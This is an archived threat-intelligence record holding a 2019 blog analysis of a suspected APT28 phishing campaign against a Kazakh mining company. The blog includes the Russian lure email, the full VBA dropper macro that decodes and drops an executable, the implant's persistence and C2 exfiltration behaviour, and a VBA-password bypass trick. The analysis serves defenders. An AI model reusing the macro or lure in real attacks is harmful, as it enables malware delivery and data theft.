{
	"id": "64c5b718-b931-4b1e-933f-640265a2c05e",
	"created_at": "2026-04-06T00:12:03.580264Z",
	"updated_at": "2026-04-10T13:11:28.466348Z",
	"deleted_at": null,
	"sha1_hash": "c4fc00e74093b4213cd2ae36aa45a0178eb5e462",
	"title": "10/24/2019 - APT28: Targeted attacks against mining corporations in Kazakhstan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2270638,
	"plain_text": "10/24/2019 - APT28: Targeted attacks against mining corporations in Kazakhstan\r\nBy MELTX0R\r\nPublished: 2019-10-24 · Archived: 2026-04-02 11:31:43 UTC\r\nSummary\r\nAPT28 (also commonly known as FancyBear, STRONTIUM, Sednit, Sofacy, and more) is a threat group that has been attributed to Russia’s Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment. The group has been regarded as being active since at least 2004, and is espionage motivated. Its targets have included the private sector, military, and governments across the world. In this post, I will review a campaign that I believe to have been conducted by APT28.\r\nAnalysis\r\nWhile performing research, I came across an interesting document titled “gorodpavlodar.doc”. This document was an attachment within an equally interesting email, which was sent to multiple individuals who, as far as my research indicates, work for a large mining corporation with operations located in Kazakhstan. The email purports to be sent from the “OFFICIAL RESOURCE OF THE CITY OF PAVLODAR”, but is actually sent by the address “pavlodar.news@bk.ru”. Pavlodar is a city in northeastern Kazakhstan and the capital of the Pavlodar Region. The original email and a translation are listed below; the email prompts the recipient to review the attached document.\r\nORIGINAL (RUSSIAN):\r\nFrom: ОФИЦИАЛЬНЫЙ РЕСУРС ГОРОДА ПАВЛОДАР [pavlodar.news@bk.ru]\r\nSubject: ГРАФИК ПОДКЛЮЧЕНИЯ ВАШЕГО ЖИЛОГО ДОМА К ГОРЯЧЕМУ ВОДОСНАБЖЕНИЮ\r\nНа сегодняшний день без горячего водоснабжения остаются 240 многоэтажных жилых домов, передаёт корреспондент pavlodarnews.kz.\r\nС 13 по 19 мая ТОО «Павлодарские тепловые сети» проводило гидравлические испытания на инженерных сетях теплоснабжения в северной части города. Было выявлено 84 повреждения, связи с чем на сегодняшний день без ГВС остаются 240 многоэтажных жилых домов.\r\nhttps://meltx0r.github.io/tech/2019/10/24/apt28.html\r\nPage 1 of 7\r\nС графиком подключения жилых домов к горячему водоснабжению вы можете ознакомится во вложении, прикрепленному к письму.\r\n________________________________\r\nОФИЦИАЛЬНЫЙ ИНТЕРНЕТ-РЕСУРС АКИМАТА ГОРОДА ПАВЛОДАР\r\nTRANSLATION:\r\nFrom: OFFICIAL RESOURCE OF PAVLODAR CITY [pavlodar.news@bk.ru]\r\nSubject: SCHEDULE OF CONNECTING YOUR RESIDENTIAL HOUSE TO HOT WATER SUPPLY\r\nTo date, 240 multi-storey residential buildings remain without hot water, reports correspondent pavlodarnews.kz.\r\nFrom May 13 to 19, Pavlodar Heating Networks LLP conducted hydraulic tests on heat supply engineering networks in the northern part of the city. 84 faults were identified, in connection with which 240 multi-storey residential buildings remain without hot water supply to date.\r\nYou can familiarize yourself with the schedule for connecting residential buildings to hot water in the attachment attached to the letter.\r\n________________________________\r\nOFFICIAL INTERNET RESOURCE OF AKIMAT CITY PAVLODAR\r\nThe attached document also contained text written in Russian, which translated roughly to “Schedule of connecting your residential house to hot water supply” and purported to be from the “Official Internet Resource of Akimat City Pavlodar”. The document appeared to be a form for the recipients to fill out with their address, the date the hot water was cut off, and the reason for the lack of hot water. It also prompts the recipient to enable Editing/Content to view the “protected” document.\r\nShown above: Suspected APT28 Lure “gorodpavlodar.doc”\r\nOpening the Visual Basic console via the Developer tab in Word reveals a password-protected project that would run if content were enabled. To bypass this password restriction, I opened the document within a hex editor, searched for the string “DPB=” which contains the VBA password, and changed it to “DPx=”. Opening the project after this causes Word to throw multiple errors regarding the invalid key (DPx), but allows me to bypass the password restriction. This allows me to view the contents of the project, displayed below, which looks to be a UserForm containing quite a lot of data in two of the input boxes, in addition to some labels.\r\nShown above: Suspected APT28 Lure VBA Project\r\nIf I extract the embedded macro, I can see that it essentially does two things: it creates two files (graphic.doc and libssl.exe) from the code embedded within the VBA project, and drops those files in the “C:\\Users\\[username]\\AppData\\Roaming” directory.\r\nPrivate Sub Document_Open()\r\nOn Error Resume Next\r\nDim ds As String: ds = Environ(\"APPDATA\") \u0026 \"\\graphic.doc\"\r\nDim dd As String: dd = Environ(\"APPDATA\") \u0026 tyihkcjfghkvb.dvxdcxxv.Caption \u0026 tyihkcjfghkvb.Label1\r\nvbnbnm dd, drgvfdhre(tyihkcjfghkvb.dxvgfchftbxfh.Value)\r\nvbnbnm ds, drgvfdhre(tyihkcjfghkvb.Text.Value)\r\nSet qw = CreateObject(\"Word.Application\")\r\nqw.Visible = True\r\nSet ww = qw.Documents.Open(ds)\r\nApplication.Quit SaveChanges:=wdDoNotSaveChanges\r\nEnd Sub\r\nPrivate Function drgvfdhre(tyruyt)\r\n Dim fghfhggjj, asddf\r\n Set fghfhggjj = CreateObject(\"Microsoft.XMLDOM\")\r\n Set asddf = fghfhggjj.createElement(\"tmp\")\r\n asddf.dataType = \"bin.base64\"\r\n asddf.Text = tyruyt\r\n drgvfdhre = asddf.nodeTypedValue\r\nEnd Function\r\nPrivate Sub vbnbnm(tgbyh, edcrf)\r\n Dim qsxx\r\n Set qsxx = CreateObject(\"ADODB.Stream\")\r\n qsxx.Type = 1\r\n qsxx.Open\r\n qsxx.Write edcrf\r\n qsxx.SaveToFile tgbyh, 2\r\nEnd Sub\r\nShown above: Macro within gorodpavlodar.doc\r\nFollowing execution of the macro, the original document is deleted and the secondary document “graphic.doc” is opened. This document appears to be a “completed” version of the form contained within the original document, and also contains an embedded macro that executes the aforementioned executable “libssl.exe”.\r\nShown above: graphic.doc\r\nOnce “libssl.exe” executes, it modifies the registry to maintain persistence (HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run). It then initiates Command \u0026 Control communications via HTTP POST requests to two hard-coded URLs, www.gorodpavlodar.kz/modules/Contact/Includes/1c.php and www.gorodpavlodar.kz/modules/Contact/Includes/2c.php, with a hard-coded User-Agent string “Mozilla/5.0 (Windows NT 10.0; Win64; x64)”. The information POSTed includes URL-encoded host information, such as a unique ID, drive information, hostname, OS, username, BIOS, date, process listing, and more. In the past, these POST requests would receive binary data in the server responses, but they are now being met with HTTP 404 responses.\r\nShown above: Suspected Zebrocy Implant C2 network capture\r\nWhile I will leave the in-depth malware analysis to those more adept, the observed activity related to the binary up to this point is very reminiscent of APT28’s “Zebrocy” implant. Furthermore, static analysis of the binary reveals numerous similarities to other documented Zebrocy samples, particularly the one documented by Vitali Kremez (reference 1 below). While this isn’t conclusive evidence that APT28 is responsible for this sample, the similarities between it and other confirmed Zebrocy implants, in addition to the fact that Kazakhstan has historically been targeted by APT28, are quite suspect. Regardless, it was an interesting sample to review and gives insight into potential economic espionage activities.\r\nIndicators\r\nIndicator | Type | Description\r\n27e9247d28598207794424eeb5ea4b1b | MD5 | libssl.exe - Suspected Zebrocy Implant\r\na863c2944581bc734619bf8d6ab1aef8 | MD5 | gorodpavlodar.doc - Suspected Zebrocy dropper document\r\n57c2b46c7f2ad9aba80e4b6248f9367a | MD5 | graphic.doc\r\n/modules/Contact/Includes/1c.php | URI | Suspected Zebrocy Implant C2 URI Pattern\r\n/modules/Contact/Includes/2c.php | URI | Suspected Zebrocy Implant C2 URI Pattern\r\npavlodar.news@bk.ru | Email Address | Email Address used in suspected APT28 campaign\r\nReferences/Further Reading\r\n1. https://www.vkremez.com/2019/01/lets-learn-overanalyzing-one-of-latest.html\r\n2. https://attack.mitre.org/groups/G0007/\r\nSource: https://meltx0r.github.io/tech/2019/10/24/apt28.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://meltx0r.github.io/tech/2019/10/24/apt28.html"
	],
	"report_names": [
		"apt28.html"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434323,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c4fc00e74093b4213cd2ae36aa45a0178eb5e462.pdf",
		"text": "https://archive.orkl.eu/c4fc00e74093b4213cd2ae36aa45a0178eb5e462.txt",
		"img": "https://archive.orkl.eu/c4fc00e74093b4213cd2ae36aa45a0178eb5e462.jpg"
	}
}